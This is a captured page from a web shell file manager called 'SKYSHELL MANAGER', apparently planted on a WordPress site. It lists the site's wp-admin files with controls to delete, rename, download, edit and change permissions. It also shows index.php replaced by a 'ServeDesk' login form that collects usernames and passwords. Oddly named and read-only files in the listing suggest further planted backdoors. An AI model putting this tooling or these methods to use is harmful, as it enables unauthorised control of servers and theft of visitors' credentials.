📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.php
<?php session_start(); $loginError = ""; if(isset($_SESSION['login_error'])){ $loginError = $_SESSION['login_error']; unset($_SESSION['login_error']); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>ServeDesk</title> <link rel="icon" type="image/svg+xml" href="images/fav.ico"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/5.3.3/css/bootstrap.min.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-icons/1.11.3/font/bootstrap-icons.min.css"> <link rel="preconnect" href="https://fonts.googleapis.com"> <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800&display=swap" rel="stylesheet"> <link rel="stylesheet" href="css/style.css"> </head> <body> <div class="login-wrap"> <div class="login-card w-100"> <div class="row g-0"> <div class="col-lg-5 login-side"> <a href="#" class="d-flex align-items-center gap-2 text-white fw-bold fs-4 mb-4 text-decoration-none"> <img src="images/logo-mark.svg" width="30px" alt="ServeDesk"> ServeDesk </a> <h3 class="fw-bold mb-3">Submit, track, and manage server requests with ease</h3> <ul class="list-unstyled"> <li><i class="bi bi-check-circle-fill mt-1"></i> Submit server provisioning and technical requests in minutes</li> <li><i class="bi bi-check-circle-fill mt-1"></i> Track request status from Pending to Completed in real time</li> <li><i class="bi bi-check-circle-fill mt-1"></i> View complete request history and progress from your dashboard</li> </ul> </div> <div class="col-lg-7 login-form-side"> <h4 class="fw-bold mb-1">Welcome back</h4> <p class="text-muted mb-4">Sign in to access your dashboard.</p> <?php if($loginError != "") { ?> <div class="alert alert-danger alert-dismissible fade show" role="alert"> <strong>Login Failed!</strong><br> <?php echo $loginError; ?> <button type="button" class="btn-close" data-bs-dismiss="alert"></button> </div> <?php } ?> <form action="login-process.php" method="post" novalidate> <div class="mb-3"> <label for="loginEmail" class="form-label fw-semibold">User name</label> <input type="email" name="username" class="form-control form-control-lg" placeholder="username" required> </div> <div class="mb-3"> <label for="loginPassword" class="form-label fw-semibold">Password</label> <input type="password" name="password" class="form-control form-control-lg" placeholder="••••••••" required> </div> <button type="submit" class="btn btn-brand btn-lg w-100 mb-3">Sign In</button> </form> </div> </div> </div> </div> <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/5.3.3/js/bootstrap.bundle.min.js"></script> <script src="js/app.js"></script> </body> </html>
Save